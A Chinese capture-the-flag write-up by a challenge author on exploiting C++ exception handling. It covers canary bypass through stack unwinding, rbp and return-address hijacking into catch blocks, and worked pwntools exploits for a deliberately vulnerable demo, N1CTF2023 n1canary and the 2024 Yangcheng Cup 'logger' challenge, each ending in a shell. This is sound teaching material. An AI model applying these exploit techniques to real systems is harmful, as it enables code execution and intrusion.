分享一次 C++ PWN 出题经历——深入研究异常处理机制

本文由笔者首发于先知社区的技术文章板块：https://xz.aliyun.com/t/16652

一、原理探究

C++异常处理

本节内容针对 Linux 下的 C++ 异常处理机制，重点在于研究如何在异常处理流程中利用溢出漏洞，所以不对异常处理及 unwind 的过程做详细分析，只做简单介绍

异常机制中主要的三个关键字：throw 抛出异常，try 包含异常模块, catch 捕捉抛出的异常，它们一起构成了由 “抛出->捕捉->回退” 等步骤组成的整套异常处理机制

当一个异常被抛出时，就会立即引发 C++ 的异常捕获机制。异常被抛出后如果在当前函数内没能被 catch，该异常就会沿着函数的调用链继续往上抛，在调用链上的每一个函数中尝试找到相应的 catch 并执行其代码块，直到走完整个调用链。如果最终还是没能找到相应的 catch，那么程序会调用 std::terminate()，这个函数默认是把程序 abort

其中，从程序抛出异常开始，沿着函数的调用链找相应的 catch 代码块的整个过程叫作栈回退 stack unwind

回到对 C++ 异常处理机制进行利用的话题，下面开始调试一个 demo 来加深对异常处理机制的理解，目的是去验证下列两个想法的可行性：

通过篡改 rbp 可以实现类似栈迁移的效果，来控制程序执行流 ROP
unwind 会检测在调用链上的函数里是否有 catch handler，要有能捕捉对应类型异常的 catch 块；通过劫持 ret 可以执行到目标函数的 catch 代码块，但是前提是要需要拥有合法的 rbp

demo 的源码如下

// exception.cpp
// g++ exception.cpp -o exc -no-pie -fPIC
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
void backdoor()
{
    try
    {
        printf("We have never called this backdoor!");
    }
    catch (const char *s)
    {
        printf("[!] Backdoor has catched the exception: %s\n", s);
        system("/bin/sh");
    }
}
 
class x
{
public:
    char buf[0x10];
    x(void)
    {
        // printf("x:x() called!\n");
    }
    ~x(void)
    {
        // printf("x:~x() called!\n");
    }
};
 
void input()
{
    x tmp;
    printf("[!] enter your input:");
    fflush(stdout);
    int count = 0x100;
    size_t len = read(0, tmp.buf, count);
    if (len > 0x10)
    {
        throw "Buffer overflow.";
    }
    printf("[+] input() return.\n");
}
 
int main()
{
    try
    {
        input();
        printf("--------------------------------------\n");
        throw 1;
    }
    catch (int x)
    {
        printf("[-] Int: %d\n", x);
    }
    catch (const char *s)
    {
        printf("[-] String: %s\n", s);
    }
    printf("[+] main() return.\n");
    return 0;
}

调试分析第一种利用方式

上述源码编译出来的可执行文件的保护如下，开了 canary 保护

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

输入点 buf 距离 rbp 的距离是 0x30

所以测试输入长度分别为 0x31 和 0x39 的 PoC，发现会报不同的 crash，合理推测栈上的数据（例如 ret, rbp）会影响异常处理的流程

ve1kcon@wsl:~$ cyclic 48
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaa
ve1kcon@wsl:~$ cyclic 56
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaa

能发现无论怎么样都不会输出程序里写在 input() 函数里的 [+] input() return.

这是因为异常处理时从 __cxa_throw() 开始，之后进行 unwind, cleanup, handler, 程序不会再执行发生异常所在函数的剩余部分，会沿着函数调用链往回找能处理对应异常的最近的函数，然后回退至此函数执行其 catch 块后跟着往下运行，途径的函数的剩余部分也不会再执行，自然不会执行到出现异常的函数的 throw 后面的语句，更不会执行到这些函数的 ret

这里就能抛出一个思考了：对 canary 的检测一般在最后的函数返回处，那么在执行异常处理流程时不就能跳过 stack_check_fail() 这个调用了嘛？

下面利用 poc1 = padding + '\x01' 覆盖 rbp 值，可以将断点断在 call _read 指令后面一点的位置，这样就能断下来了，在这里观察到 rbp 的低一字节已被成功篡改为 '\x01'

继续运行至程序报错的位置，最后在 0x401506 这条 ret 指令处出了问题，是错误的返回地址导致的，记录下这个指令地址，后续可以将断点打在这里，观察是否能成功控制程序流

根据这个指令的地址，可以在 IDA 中定位到这是异常处理结束后最终的 ret 指令，所以可以确定是在执行 main 的 handler 时 crash，那么上述报错出现的原因其实就很明显了，是因为最后执行的 leave; ret 使得 ret 的地址变成了 [rbp+8]，导致不合法的返回地址。这也意味着在 handler 里就能够完成栈迁移，所以可以尝试通过篡改 rbp 实现控制程序执行提前布置好的 ROP 链

接下来尝试劫持程序去执行 GOT 表里的函数

.got.plt:0000000000404040 off_404040      dq offset fflush        ; DATA XREF: _fflush+4↑r
.got.plt:0000000000404048 off_404048      dq offset read          ; DATA XREF: _read+4↑r
.got.plt:0000000000404050 off_404050      dq offset puts          ; DATA XREF: _puts+4↑r
.got.plt:0000000000404058 off_404058      dq offset __cxa_end_catch

利用 poc2 = padding + p64(0x404050-0x8)，运行到上述断点处发现成功调用到了 puts 函数

证明第一种利用方式可行

关于第一种利用方式的后续思考

但这种利用方式只适用于 “通过将 old_rbp 存储于栈中来保留现场” 的函数调用约定，以及需要出现异常的函数的 caller function 要存在处理对应异常的代码块，否则也会走到 terminate

为了调试上述说法，对 demo 作了修改，主要改动如下

void test()
{
 x tmp;
 printf("[!] enter your input:");
 fflush(stdout);
 int count = 0x100;
 size_t len = read(0, tmp.buf, count);
 if (len > 0x10)
 {
     throw "Buffer overflow.";
 }
 printf("[+] test() return.\n");
}
 
void input()
{
 test();
 printf("[+] input() return.\n");
}

这回同样是使用 poc2，但 crash 了

对 demo 重新修改的部分如下

void input()
{
 try
 {
     test();
 }
 catch (const char *s)
 {
     printf("[-] String(From input): %s\n", s);
 }
 printf("[+] input() return.\n");
}

复现成功，这次是在 input 的 handler 里被劫持，而非在 main 了

但是噢，如果是通过打返回地址劫持到另外一个函数的异常处理模块，是没有 “出现异常的函数的 caller function 要存在处理对应异常的代码块” 这层限制的，但这也是后话了

调试分析第二种利用方式

由于调用链 __cxa_throw -> _Unwind_RaiseException，在 unwind 函数里会取运行时栈上的返回地址 callee ret 来对整个调用链进行检查，它会在链上的函数里搜索 catch handler，若所有函数中都无对应类型的 catch 块，就会调用 __teminate() 终止进程。

利用 poc3 = poc2 + 'b'*8 调试一下后面的 unwind 函数的过程，一直运行至 _Unwind_RaiseException+463 发生了 crash，合理猜测是在这调用的函数里作的检测，所有可以观察下此时传参的情况，下断方式是 b *(&_Unwind_RaiseException+463)

这个地方循环执行了几次

第一次，rdx -> 0x4000000000000000

第二次，rdx -> 0x4013a7 (input()+162)

第三次，rdx -> 0x6262626262626262 ('bbbbbbbb')

再琢磨下异常处理机制，就能够发现另外一个利用点，就是假如函数A内有能够处理对应异常的 catch 块，是否可以通过影响运行时栈的函数调用链，即更改某 callee function ret 地址，从而能够成功执行到函数A的 handler 呢

下面尝试通过直接劫持 input() 函数的 ret, 可以发现在源码中有定义 backdoor() 函数，但程序中并没有一处存在对该后门函数的引用，利用 poc4 = poc2 + p64(0x401292+1) 尝试触发后门

这里将返回地址填充成了 backdoor() 函数里 try 代码块里的地址，它是一个范围，经测试能够成功利用的是一个左开右不确定的区间（x）

.text:0000000000401283                 lea     rax, format     ; "We have never called this backdoor!"
.text:000000000040128A                 mov     rdi, rax        ; format
.text:000000000040128D                 mov     eax, 0
.text:0000000000401292 ;   try {
.text:0000000000401292                 call    _printf
.text:0000000000401292 ;   } // starts at 401292
.text:0000000000401297                 jmp     short loc_4012FF

可以看见程序执行了后门函数的异常处理模块，复现成功，成功执行到了一个从未引用过的函数，而且程序从始至终都是开了 canary 保护的，这直接造成的栈溢出却能绕过 stack_check_fail() 这个函数对栈进行检测

exp 如下

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
pwnfile = './exc'
p = process(pwnfile)
 
def debug(content=None):
    if content is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, content)
        pause()
 
def exp():
    # debug('b *0x401371')              # call _read 
    # b __cxa_throw@plt
    # b *0x401506                       # handler ret
    # b *(&_Unwind_RaiseException+463)  # check ret
    test = 'a'*5
    padding = 'a'*0x30
    # poc = padding + '\n'
    poc1 = padding + '\x01'
    poc2 = padding + p64(0x404050-0x8)
    poc3 = poc2 + 'b'*8
    poc4 = poc2 + p64(0x401292+1)
    p.sendafter('input:', poc4)
 
exp()
p.interactive()

二、N1CTF2023 - n1canary

简要分析

程序保护如下

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

这是一道非常具有迷惑性的题，大致意思是：出题人自行实现了一个 canary，并将它布置在系统 canary 上面 0x10 的地方，但所有 canary 相关的检测其实都是绕不过的，漏洞点是 launch() 函数处的栈溢出，触发点是 raise() 函数处的异常抛出，异常未能正确被捕获并处理，最终是能够避开对栈上 canary 的验证并利用析构函数 ROP

程序流分析

main() 函数逻辑如下

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v3; // rdx
  __int64 v4; // rax
  _QWORD v6[3]; // [rsp+0h] [rbp-18h] BYREF
 
  v6[1] = __readfsqword(0x28u);
  setbuf(stdin, 0LL, envp);
  setbuf(stdout, 0LL, v3);
  init_canary();                                                // canary init
  std::make_unique<BOFApp>((__int64)v6);                      // *v6 -> vtable for BOFApp+16 (0x4ed510)
  v4 = std::unique_ptr<BOFApp>::operator->((__int64)v6);       // v4 = v6
  (*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 16LL))(v4); // call 0x403552 (BOFApp::launch())
  std::unique_ptr<BOFApp>::~unique_ptr((__int64)v6);
  return 0;
}

初始化 sys_canary 并读取用户输入的64个字节作为 user_canary，用来生成自定义 canary，第一个输入点的 user_canary 是往 .bss 段上写的

__int64 init_canary(void)
{
  if ( getrandom(&sys_canary, 64LL, 0LL) != 64 )
    raise("canary init error");
  puts("To increase entropy, give me your canary");
  return readall<unsigned long long [8]>(&user_canary);
}
 
__int64 __fastcall ProtectedBuffer<64ul>::getCanary(unsigned __int64 a1)
{
  return user_canary[(a1 >> 4) & 7] ^ sys_canary[(a1 >> 4) & 7];
}

这段代码实现了 BOFApp 类的构造函数，首先调用基类构造函数实现了 BOFApp 对象基类部分的初始化，然后将 BOFApp 对象的虚函数表指针设置为 off_4ED510，使得对象能够正确调用其虚函数。通过调试发现，赋值语句执行前 this -> vtable for UnsafeApp+16，执行后 this -> vtable for BOFApp+16

void __fastcall BOFApp::BOFApp(BOFApp *this)
{
  UnsafeApp::UnsafeApp(this);
  *(_QWORD *)this = off_4ED510;
}

创建一个 BOFApp 类的实例，然后调用 BOFApp 的构造函数初始化对象，跟进后面那个函数发现进行了 *a1 = v1 的操作

__int64 __fastcall std::make_unique<BOFApp>(__int64 a1)
{
  BOFApp *v1; // rbx
 
  v1 = (BOFApp *)operator new(8uLL);
  *(_QWORD *)v1 = 0LL;
  BOFApp::BOFApp(v1);
  std::unique_ptr<BOFApp>::unique_ptr<std::default_delete<BOFApp>,void>(a1, v1);
  return a1;
}

执行完 std::make_unique<BOFApp>((__int64)v6) 后，栈变量 v6 被重新赋值

于是接下来调用的是 BOFApp::launch() 函数

1 2	`pwndbg> x/20gx` `0x4ed510+0x10` `0x4ed520 <vtable` `for` `BOFApp+32>: 0x0000000000403552 0x0000000000000000`

在 IDA 里计算也是一样的，执行 (*(void (__fastcall **)(__int64))(*(_QWORD *)v4 + 0x10LL))(v4); 语句，即 call *(0x4ED510+0x10)

.data.rel.ro:00000000004ED510 off_4ED510      dq offset _ZN6BOFAppD2Ev
.data.rel.ro:00000000004ED510                                         ; DATA XREF: BOFApp::BOFApp(void)+16↑o
.data.rel.ro:00000000004ED510                                         ; BOFApp::~BOFApp()+9↑o
.data.rel.ro:00000000004ED510                                         ; BOFApp::~BOFApp()
.data.rel.ro:00000000004ED518                 dq offset _ZN6BOFAppD0Ev ; BOFApp::~BOFApp()
.data.rel.ro:00000000004ED520                 dq offset _ZN6BOFApp6launchEv ; BOFApp::launch(void)

最后是对象的析构函数，里面要重点关注的函数的路径是 std::unique_ptr<BOFApp>::~unique_ptr() --> std::default_delete<BOFApp>::operator()(BOFApp*)，这里存在函数指针调用，这意味着只需要控制 a2 的值就能控制程序流

__int64 __fastcall std::default_delete<BOFApp>::operator()(__int64 a1, __int64 a2)
{
  __int64 result; // rax
 
  result = a2;
  if ( a2 )
    return (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)a2 + 8LL))(a2);
  return result;
}

通过逆向分析和调试可知参数 a2 与前面提到的栈变量 v6 有关，所以将断点打在 0x40340D，正常输入，调试一下看传参情况

查看虚函数表指针 +0x8 位置处指向什么函数，0x4038b8

再把断点打在 0x403909，看到这里确实调用到了上述函数

漏洞点分析&跟踪调用链

第二个输入点存在栈溢出，调用链是 BOFApp::launch(void) --> ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>(BOFApp::launch(void)::{lambda(char *)#1} const&) --> BOFApp::launch(void)::{lambda(char *)#1}::operator()(char *)

__int64 __fastcall BOFApp::launch(void)::{lambda(char *)#1}::operator()(
        __int64 a1,
        __int64 a2,
        int a3,
        int a4,
        int a5,
        int a6)
{
  return _isoc23_scanf((unsigned int)"%[^\n]", a2, a3, a4, a5, a6, a2, a1);
}

下列是 GPT 的解释

_isoc23_scanf 根据格式字符串读取输入。格式字符串 "%[^\n]" 表示读取所有非换行符的字符，直到遇到换行符为止。这样写其实就相当于 c 的 gets() 了。

输入存储：将读取的输入存储在 a2 指向的缓冲区中。

a3, a4, a5, a6 是额外参数，可能用于其他目的。

观察下这个 _isoc23_scanf() 函数，断点打在 0x403547 处观察数据写入的位置

计算输入点与目标指针的距离为 0x70

所以可以利用上述栈溢出去修改自定义 canary，来触发异常，栈回退避开对自定义 canary 和系统 canary 的检测，最后调用到析构函数

这样下来，思路就理清楚了，在 user_canary 处伪造虚函数表指向后门函数，然后利用溢出修改存储在栈上的 BOFApp 对象的虚函数表指针，即变量 v6，在此过程中自定义 canary 一定会被篡改，程序将会在 raise() 函数里抛出异常，这里是漏洞的触发点，调用链如下
BOFApp::launch(void) --> ProtectedBuffer<64ul>::mut<BOFApp::launch(void)::{lambda(char *)#1}>(BOFApp::launch(void)::{lambda(char *)#1} const&) --> ProtectedBuffer<64ul>::check(void) --> raise(char const*)

bool __fastcall ProtectedBuffer<64ul>::check(unsigned __int64 a1)
{
  __int64 v1; // rbx
  bool result; // al
 
  v1 = *(_QWORD *)(a1 + 0x48);
  result = v1 != ProtectedBuffer<64ul>::getCanary(a1);
  if ( result )
    raise("*** stack smash detected ***");
  return result;
}
 
void __fastcall __noreturn raise(const char *a1)
{
  std::runtime_error *exception; // rbx
 
  puts(a1);
  exception = (std::runtime_error *)_cxa_allocate_exception(0x10uLL);
  std::runtime_error::runtime_error(exception, a1);
  _cxa_throw(exception, (struct type_info *)&`typeinfo for'std::runtime_error, std::runtime_error::~runtime_error);
}

异常处理流程最终调用到的析构函数处存在指针调用，但此时指针已被我们提前利用溢出数据控好了，造成任意代码执行

可以直接动调一下 raise() 函数内部，然后再看看函数返回哪里呢。可以在一些地方下断点调试看看，比如 0x403291 处的抛出异常，0x403432 处的调用析构函数，最后在 0x4038fc 出现 crash，原因是不合法的 RAX，它的值是 BOFApp 类对象指针 v6，这是可以利用溢出写到那的，所以是可控的，继续往下看后面的汇编，会发现只要控了 RAX 就能够控到 RDX，在最后的 call rdx; 处便能造成任意代码执行

由于 user_canary 可控，可以尝试在这里伪造虚函数表并将指针劫持到这，这是构造好的 exp 运行到此处时的参数情况

成功执行到后门函数

关于本题的其他思考

另外提一嘴，上面提到了避开 canary 检测执行到析构函数，笔者是这样理解的：在程序正常运行时应该是在执行完 launch() 函数后执行析构函数，但在 raise() 函数里却有异常被抛出，而且回溯了整条函数调用链，包括 raise() 函数本身，都没看见有能处理此异常的 catch 代码块，合理猜测最终将会由 handler 执行析构函数，在此过程中自然也绕过了程序自身的 __stack_chk_fail_local 检测

其实在创建对象的函数里，创建对象时会有构造函数，函数返回处会有析构函数。但当该函数运行到一半就抛出了异常时，若在当前函数内不能正常捕捉异常，那这个函数剩下的部分便不会再被执行到了，自然也不会运行到函数返回处的那个析构函数。但是程序依旧是需要去运行析构函数销毁对象的，达到释放资源的目的，这种情况下应该是在 handler 中调用到析构函数的

漏洞利用

最终的 exp 如下，还有一点要注意的是，中途覆盖到的函数返回地址是不能乱填的，具体原因详见前面的 “原理探究”，与 unwind() 函数里的检测有关，所以 ret 填回原来的 0x403407

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
pwnfile = './n1canary'
p = process(pwnfile)
 
def debug(content=None):
    if content is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, content)
        pause()
 
def exp():
    # debug('b *0x403547')
    # b *0x40340D               # Destructor
    # b *0x403909               # pointer call
    # b *0x403291               # raise->throw
    # b *0x403432               # <main+146>    call std::unique_ptr<BOFApp, std::default_delete<BOFApp> >::~unique_ptr()
    # b *0x4038fc
    backdoor = 0x403387
    user_canary = 0x4F4AA0
    payload = p64(user_canary+8) + p64(backdoor)*2
    payload = payload.ljust(0x40, 'a')
    p.sendafter('canary\n', payload)
 
    payload = 'a'*(0x70-0x8)
    payload += p64(0x403407)    # ret
    # payload += 'a'*(0x8)
    payload += p64(user_canary) # BOFApp *v6
    # p.sendlineafter(' to pwn :)\n', payload)
 
exp()
p.interactive()

成功劫持到后门，后门命令执行了 /readflag

三、2024年”羊城杯“粤港澳大湾区网络安全大赛 - logger

来自出题人的碎碎念

笔者作为 “2024羊城杯” PWN 方向出题人，自然要顺带唠一唠这道自己出的题目，虽谈不上巧妙（水平有限），但也有不少师傅反馈说受益匪浅

这道题从整体上来看算是中等难度，属于一道机制题，若是将上面的知识都了解透彻后，会做得很顺畅

由于从现在网上公开的文章里，能看到很多师傅都对这道题做了详细的分析，所以笔者主要讲点有意思的地方，不至于让读了文章的师傅空手而归，打算结合源码（上帝视角 XD）和逆向分析的效果对这道题进行剖析

题目分析&漏洞分析

首先这道题的创新点在于对抛出异常语句的篡改，最终通过溢出漏洞劫持到有后门的处理块 getshell

细心的师傅可能一下就能发现，trace 功能的实现里存在数组 oob 漏洞，毕竟这个 <= 怎么看都显得十分拙劣

那上述越界能起到什么作用呢？byte_404020[] 数据的大小是 0x80，若能写入九次（0~8） 0x10 大小的数据，恰好能改掉下面 src[] 数组，这个数组存放了一个字符串 Buffer Overflow

结合源码来看，这个字符串的作用是：在检测到溢出的时抛出 Buffer Overflow 字符串，而正常来说是由下面的 catch 块来处理这个异常，它接受的是 const char *s 类型的异常

1733721217757

warn 函数里存在大量的溢出写，紧随其后的是检查 read 的返回值（实际写入的字节数），那其实就在通过对 v0 的检测来判断是否有栈溢出了，所以在检测到存在溢出风险时会执行 if 模块，抛出异常

然后被抛出的异常字符串就会被上面提到的 catch 块处理，效果是输出报错信息 [-] An exception of type String variable "Buffer Overflow" was caught...

但是假如说若能够劫持到别的 catch 块进行处理呢？笔者预置了一个后门函数，其 catch (const char *s) 也能够捕获字符串类型的异常，劫持到这里即可，源码如下

后门的 try 块地址是 0x401BC2，在下面有对 _system 的调用

比较有意思的是 IDA 似乎对异常处理 catch 模块的解析有问题，可见对 strHandler() 函数的反编译效果如下，可以对比上面提供的源码

所以解题时只能够查看对 _system 函数的交叉引用，然后定位到具体位置后看汇编进行分析了

漏洞利用

梳理完毕，现在思路明确了，先是通过数组越界漏洞劫持字符串为 /bin/sh\x00，然后通过溢出漏洞劫持到后门 catch 进行异常处理，即 0x401BC2+1 的位置，最终执行到 system(/bin/sh)

exp 如下

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
pwnfile = './pwn'
p = process(pwnfile)
# p = remote('', )
 
def debug(content=None):
    if content is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, content)
        pause()
 
def menu(index):
    p.sendlineafter('chocie:', str(index))
 
def trace(content='a', judge='n'):
    menu(1)
    p.sendlineafter('here: ', content)
    p.sendlineafter('records? ', judge)
 
def exp():
    # debug('b *$rebase(0x26A4)')              # call _read
    # debug('b *$rebase(0x2582)')
    # b __cxa_throw@plt
 
    # payload = 'a'
    for i in range(7):
        trace()
    trace('a'*0x10,'n')
    payload = '/bin/sh;'
    trace(payload)
 
    menu(2)
    payload = 'a'*0x70
    payload += p64(0X404300)
    payload += p64(0x401BC2+1)
    p.sendafter('Type your message here plz: ', payload)
 
exp()
p.interactive()

上传的附件：

n1canary.rar （402.61kb，1次下载）
logger.rar （4.21kb，1次下载）

更多【Pwn-分享一次 C++ PWN 出题经历——深入研究异常处理机制】相关视频教程：www.yxfzedu.com

Pwn-分享一次 C++ PWN 出题经历——深入研究异常处理机制

分享一次 C++ PWN 出题经历——深入研究异常处理机制

一、原理探究

C++异常处理

调试分析第一种利用方式

关于第一种利用方式的后续思考

调试分析第二种利用方式

二、N1CTF2023 - n1canary

简要分析

程序流分析

漏洞点分析&跟踪调用链

关于本题的其他思考

漏洞利用

三、2024年”羊城杯“粤港澳大湾区网络安全大赛 - logger

来自出题人的碎碎念

题目分析&漏洞分析

漏洞利用

相关文章推荐

Markdown Editor

友情链接

课程目录

技术交流QQ群